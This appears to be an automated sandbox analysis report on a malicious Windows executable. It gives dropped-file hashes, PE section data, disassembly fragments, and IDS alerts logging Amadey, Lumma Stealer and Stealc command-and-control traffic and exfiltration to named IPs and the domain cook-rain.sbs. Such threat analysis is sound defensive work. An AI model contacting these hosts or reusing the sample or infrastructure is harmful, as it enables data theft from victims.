                                                                                                                                                                                                                                                                                                            Preview:mozLz40.......{"version":["ses....restore",1],"windows":[{"tab..bentrie...url":"about:A..."triggeringPrincipal_base64":"eyIzIjp7fX0="}],"lastAccessed":1732191208960,"hidden":false,"searchMode":null,"userContextId":0,"attributes":{},"index":1,"formdata":{"id":{...D.....91hom....itle":"New Tab","cacheKey....ID":4,"docshellUU...!"{4928f5ff-b473-439a-b63d-349ac3523a33}","resultf.4URI...pz..ToInherit..s{\"0\":...\"moz-null4...:{c0c3c76c-3c3b-44b0-9d2c-f5a4aaf1d46e}\"}....hasUserInteractW........@{\"3...E...docIdentifier":5,"persist":true)...696333857659).30mag....chrome://branding/ca..nt/icon32.png"X..requestedIk..0..aselect...,"_closedTK.@],"_...C....GroupCount":-1,....Flags":2167541758....dth":1164,"height":891,"screenXN.....Y..Aizem0.."maximized"...BeforeMin...&..workspace....85d88aad-e69b-4cbc-bd94-0aee6b4b5d51...._shouldRb....","..)At...6.........I..W...6..O........p....1":{R.hUpdate\..784,"startTim..1595...centCrash...0},"globalF.Dcook.. ho...."addons.mozilla.or..@valuE..A8bad2467092e
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):4538
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.034026111476281
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3C9F1B58B38DF24F9F7A895A30EA73E8
                                                                                                                                                                                                                                                                                                            SHA1:C318A72028A9DC512A67E76883F9729BEB804366
                                                                                                                                                                                                                                                                                                            SHA-256:D71FAC890BE4ECA8F9E77783127741A00E04D0C45F7DAEF258192A927E6D536B
                                                                                                                                                                                                                                                                                                            SHA-512:A88E7BB20B01E62009A204C26EE553E6A0027583710F1C0AABB52533EA4ECE3DA8E1B168228E826EA24F8DA6826A88A5714386F997D874DDAD88E581DECC8C28
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-11-21T12:13:56.346Z","profileAgeCreated":1696333826043,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"
                                                                                                                                                                                                                                                                                                            Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):4538
                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.034026111476281
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:3C9F1B58B38DF24F9F7A895A30EA73E8
                                                                                                                                                                                                                                                                                                            SHA1:C318A72028A9DC512A67E76883F9729BEB804366
                                                                                                                                                                                                                                                                                                            SHA-256:D71FAC890BE4ECA8F9E77783127741A00E04D0C45F7DAEF258192A927E6D536B
                                                                                                                                                                                                                                                                                                            SHA-512:A88E7BB20B01E62009A204C26EE553E6A0027583710F1C0AABB52533EA4ECE3DA8E1B168228E826EA24F8DA6826A88A5714386F997D874DDAD88E581DECC8C28
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:{"environment":{"locale":"en-US","localeLanguageCode":"en","browserSettings":{"update":{"channel":"release","enabled":true,"autoDownload":true,"background":true}},"attributionData":{"campaign":"%2528not%2Bset%2529","content":"%2528not%2Bset%2529","dlsource":"mozorg","dltoken":"cd09ae95-e2cf-4b8b-8929-791b0dd48cdd","experiment":"%2528not%2Bset%2529","medium":"referral","source":"www.google.com","ua":"chrome","variation":"%2528not%2Bset%2529"},"currentDate":"2024-11-21T12:13:56.346Z","profileAgeCreated":1696333826043,"usesFirefoxSync":false,"isFxAEnabled":true,"isFxASignedIn":false,"sync":{"desktopDevices":0,"mobileDevices":0,"totalDevices":0},"xpinstallEnabled":true,"addonsInfo":{"addons":{"formautofill@mozilla.org":{"version":"1.0.1","type":"extension","isSystem":true,"isWebExtension":true,"name":"Form Autofill","userDisabled":false,"installDate":"2023-09-28T01:41:23.000Z"},"pictureinpicture@mozilla.org":{"version":"1.0.0","type":"extension","isSystem":true,"isWebExtension":true,"name"
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):1889792
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.949390379782367
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            SHA1:55BDF77F2F4E613F2AAF0A3CC22FC2E68678AC7E
                                                                                                                                                                                                                                                                                                            SHA-256:1BF9D23D442E10A752D5FF0BAC0FC06A679FE36F8C289EA9243F5C6D94BED687
                                                                                                                                                                                                                                                                                                            SHA-512:0603EF0B95CD18343686ABF01D0DD7FD7F55693BDCC308FD50D9A66DE65F6C25C3401B21FC73AA91A7E50E3217FE127071FAA836425EB0B650621422CE26389B
                                                                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................K...........@.................................W...k.......H.....................J.............................<.J..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .`*.........................@...zbdrpywl......1.....................@...dwhjapcc......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                            Size (bytes):284
                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.4250435960994046
                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                                                                            MD5:07B6043830493A855D77AF59183B638A
                                                                                                                                                                                                                                                                                                            SHA1:31F7C0CB522CACDC72E37AFB05B0C2926AFFFCFD
                                                                                                                                                                                                                                                                                                            SHA-256:07B5FFD086D1364820C653F43DA106D38DF5D3CF5AEBE406BB46F482AC72C104
                                                                                                                                                                                                                                                                                                            SHA-512:A41C02808C2ADE34B7B7B5EBFFD6F63E80A51C247BF570B41535EF887CFF0FDF0237F348BCA9BF23BDA8E47EC0B3A7E4E476AF774CBB01EDD768F31294847CC6
                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                                                                            Preview:.....d....L....`%F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.949390379782367
                                                                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                                                                                                            File size:1'889'792 bytes
                                                                                                                                                                                                                                                                                                            MD5:fc60fac3b512854df25f9a62a8982b5f
                                                                                                                                                                                                                                                                                                            SHA1:55bdf77f2f4e613f2aaf0a3cc22fc2e68678ac7e
                                                                                                                                                                                                                                                                                                            SHA256:1bf9d23d442e10a752d5ff0bac0fc06a679fe36f8c289ea9243f5c6d94bed687
                                                                                                                                                                                                                                                                                                            SHA512:0603ef0b95cd18343686abf01d0dd7fd7f55693bdcc308fd50d9a66de65f6c25c3401b21fc73aa91a7e50e3217fe127071faa836425eb0b650621422ce26389b
                                                                                                                                                                                                                                                                                                            SSDEEP:24576:jSW/ofKP26CwSz/h3O2In5iOSCeRWwBuP/xD7LCSWSA2yJNjsu9yk5H0RhbB9XfB:jp/w6CjZO2U5iOSNRbBuhC7LqQHANlB
                                                                                                                                                                                                                                                                                                            TLSH:A995339219EFCD70C42851F1D043E7C1BEAD0EA16BCD1167D7A4857882D3F8E992F992
                                                                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                                                                            Entrypoint:0x8ae000
                                                                                                                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                            Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                                                                            jmp 00007F05C0B867CAh
                                                                                                                                                                                                                                                                                                            lfs ebx, dword ptr [eax+eax]
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            jmp 00007F05C0B887C5h
                                                                                                                                                                                                                                                                                                            add byte ptr [0000000Ah], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax+00000000h], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            or ecx, dword ptr [edx]
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            pushad
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [edi], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add eax, 0000000Ah
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], cl
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [edx], ah
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add eax, 0000000Ah
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add al, 00h
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x448.rsrc
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4ac68c0x10zbdrpywl
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x4ac63c0x18zbdrpywl
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                            0x10000x680000x2de006578751732f0e8f9612d5f004e6f3a1aFalse0.9978659315395095data7.974028691788296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            .rsrc0x690000x4480x60023f61aeefa7c3d30c07a21aa8f45e969False0.3053385416666667data5.28505835027857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            0x6b0000x2a60000x200234c168ce50b543b14a2c8e222438b2eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            zbdrpywl0x3110000x19c0000x19b800288b961cf3124a5fe8dcd27b14a5b315False0.9945464383353585data7.953452652594506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            dwhjapcc0x4ad0000x10000x400ffe89973a762fa709b54d990ead9d2adFalse0.7177734375data5.795614013244647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            .taggant0x4ae0000x30000x2200a1526951c27af5a607a50d7ed9abdf45False0.080078125DOS executable (COM)1.0262207814936712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                            RT_MANIFEST0x690700x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                                                                                                                            RT_MANIFEST0x692c80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:07.460828+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449758185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:12.045927+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44977031.41.244.1180TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:22.162141+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449764TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:23.570866+01002856121ETPRO MALWARE Amadey CnC Activity M21192.168.2.449796185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:25.077979+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449802185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:30.776213+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.4631031.1.1.153UDP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:32.280965+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449820188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:32.280965+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449820188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:32.398519+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449819185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:32.979604+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449820188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:32.979604+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449820188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:33.903638+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449826185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:34.258098+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449827188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:34.258098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449827188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:34.974004+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449827188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:34.974004+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449827188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:36.631226+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449833188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:36.631226+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449833188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:37.510711+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449833188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:38.901090+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449839188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:38.901090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449839188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:41.200761+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449844185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:41.810382+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449847188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:41.810382+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449847188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:42.596457+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449846185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:42.711364+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449850185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:43.402514+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449846185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:43.733748+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.449846TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:44.073585+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449846185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:44.194794+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.449846TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:44.757165+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449855188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:44.757165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449855188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:45.666907+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449846185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:46.553533+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449846185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:47.527138+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449863188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:47.527138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449863188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:48.131331+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449866188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:48.131331+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449866188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:48.281824+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449867185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:48.352917+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449863188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:48.352917+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449863188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:49.974307+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449870185.215.113.1680TCP
